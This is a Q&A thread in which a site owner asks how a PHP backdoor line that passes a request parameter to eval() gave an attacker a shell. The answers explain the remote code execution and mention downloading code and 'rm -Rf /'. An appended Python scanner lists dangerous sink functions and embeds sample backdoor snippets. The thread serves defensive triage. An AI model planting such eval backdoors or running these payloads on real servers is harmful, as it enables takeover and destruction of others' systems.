
Recently we've been shelled by someone I am not aware of. I've checked all the logs, and the only thing I could find was a file from a plugin that could possibly have the flaw; after he POSTed to this URL, he had access to the uploaded file, which was indeed a shell.

I am suspecting that this line of code is causing the issue.

<?php
// As posted: whatever arrives in the request parameter "null" is run as PHP.
(isset($_REQUEST['null']) ? @eval($_REQUEST['null']) : null);

Could anyone explain to me how someone would get a shell through this? I'm really curious how he did it, so I can also sift through the other plugins for bad code like this. They basically uploaded a file through this. Maybe file_put_contents() or an actual POST request with an image?

I'm not familiar with hacking; I've also never used eval, as I heard that it is in fact an evil function. Also please note that I will NOT use this to hack other sites; I just want to understand what's going on here.

Jonathan Leffler
Jordy

2 Answers


That's a BIG flaw! You can pass a whole PHP script (via POST) and it will be executed on your server.

Picture PHP code that uses curl (http://php.net/curl) to download any other malicious code onto your server.

Or you can just send an rm -Rf / and say goodbye to your filesystem...

vsmoraes

By issuing a request like this

http://yourdomain.com/file.php?null=PHP_PAYLOAD

Because of eval, the PHP_PAYLOAD will be evaluated/executed.

The payload can be anything that's valid PHP: for example, writing new files, downloading them onto the server, or running shell commands via shell_exec.

Any valid PHP code would be executed.

Alex Andrei
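Both answers make the same point: whatever arrives in the `null` parameter (query string or POST body, since `$_REQUEST` accepts either) is handed straight to eval() and runs as PHP on the server. The practical follow-up, since the question also asks how to look through the other plugins for the same kind of code, is a scanner for that pattern. The script below is an added example, not code from the question or either answer. It flags lines where request data reaches a code, shell or file-writing function, follows a variable assigned from a superglobal to a later sink call in the same file, and catches the two classic backdoor disguises (eval of a base64 payload, preg_replace with the /e modifier). The PHP snippets in SAMPLES are constructed for the demo (the first contains the exact line from the question), and the sink and source lists are assumptions about what to look for, not an exhaustive catalogue.

```python
"""Scan PHP sources for eval()-style backdoors that execute request data.

Added example; not code from the question or either answer. The PHP
snippets in SAMPLES are constructed for the demo (one of them is the
line from the question); a real scan would read plugin files from disk.
"""
import re
import sys
from pathlib import Path

# Functions that turn a string into PHP code, a shell command or a file.
SINKS = ("eval", "assert", "create_function", "system", "exec", "shell_exec",
         "passthru", "popen", "proc_open", "file_put_contents", "fwrite")
# Superglobals whose contents the HTTP client chooses ($_FILES is left out:
# move_uploaded_file($_FILES[...]) is what a legitimate upload handler does).
SOURCES = ("_REQUEST", "_GET", "_POST", "_COOKIE", "_SERVER")

SINK_RE = re.compile(r"@?\b(" + "|".join(SINKS) + r")\s*\(", re.I)
SOURCE_RE = re.compile(r"\$(" + "|".join(SOURCES) + r")\b")
ASSIGN_RE = re.compile(r"\$(\w+)\s*=(?!=)")          # $var = ... (not == / ===)
# eval(base64_decode(...)), possibly wrapped in gzinflate()/str_rot13() etc.
B64_EVAL_RE = re.compile(r"\beval\s*\(\s*(?:@?\w+\s*\(\s*)*base64_decode", re.I)
# preg_replace('<delim>...<delim><mods>', ...): the /e modifier evals the replacement
PREG_E_RE = re.compile(r"preg_replace\s*\(\s*(['\"])(\S).*?\2([a-zA-Z]*)\1", re.I)


def scan_php_source(name, source):
    """Return a list of findings for one PHP file given as a string."""
    findings = []
    tainted = set()  # variables assigned from a superglobal earlier in the file

    def carries_request_data(text):
        if SOURCE_RE.search(text):
            return True
        return any(re.search(r"\$" + re.escape(v) + r"\b", text) for v in tainted)

    for lineno, line in enumerate(source.splitlines(), start=1):
        code = line.strip()
        if code.startswith(("//", "#", "*", "/*")):
            continue  # comment line
        reason = None
        sink = SINK_RE.search(line)
        if sink and carries_request_data(line):
            reason = f"request data reaches {sink.group(1).lower()}()"
        elif B64_EVAL_RE.search(line):
            reason = "eval() of a base64-encoded payload"
        else:
            m = PREG_E_RE.search(line)
            if m and "e" in m.group(3).lower():
                reason = "preg_replace() with /e modifier runs the replacement as PHP"
        if reason:
            findings.append({"file": name, "line": lineno, "reason": reason, "code": code})
        # Remember variables that now hold request data so later sink calls are caught.
        for assign in ASSIGN_RE.finditer(line):
            if carries_request_data(line[assign.end():]):
                tainted.add(assign.group(1))
    return findings


def scan_all(files):
    """files: {path: source}. Returns findings across all files, in file order."""
    out = []
    for name, source in files.items():
        out.extend(scan_php_source(name, source))
    return out


def scan_directory(root):
    """Scan every *.php file under root (the real-world entry point)."""
    paths = sorted(Path(root).rglob("*.php"))
    return scan_all({str(p): p.read_text(errors="replace") for p in paths})


# Constructed sample plugin files; the first contains the line from the question.
# The base64 blob below is made-up filler, not a real payload.
SAMPLES = {
    "plugins/gallery/upload.php": r"""<?php
$max = 1024 * 1024;
(isset($_REQUEST['null']) ? @eval($_REQUEST['null']) : null);
""",
    "plugins/seo/helper.php": r"""<?php
$cmd = $_GET['c'];
// two lines later the same variable reaches a shell
system($cmd);
""",
    "plugins/stats/track.php": r"""<?php
eval(gzinflate(base64_decode('eJwrSS0qKc3LLEnMS8pM')));
""",
    "plugins/old/filter.php": r"""<?php
$out = preg_replace('/(.*)/e', 'strtoupper("\\1")', $input);
""",
    "plugins/clean/index.php": r"""<?php
$q = $_GET['q'];
echo htmlspecialchars($q, ENT_QUOTES, 'UTF-8');
$title = preg_replace('/\s+/', ' ', $title);
""",
}

if __name__ == "__main__":
    results = scan_directory(sys.argv[1]) if len(sys.argv) > 1 else scan_all(SAMPLES)
    for f in results:
        print(f"{f['file']}:{f['line']}: {f['reason']}\n    {f['code']}")
```

Run it with a directory argument to scan real plugin files; without one it scans the constructed samples and reports four hits (the question's eval line, the $_GET-to-system() pair, the base64 eval and the /e preg_replace) while leaving the clean file alone. It is a line-based triage tool: a statement split across lines, `$$var` indirection or a value passed through a function it does not track will slip past it, so an empty report is a reason to look harder, not proof that the other plugins are clean.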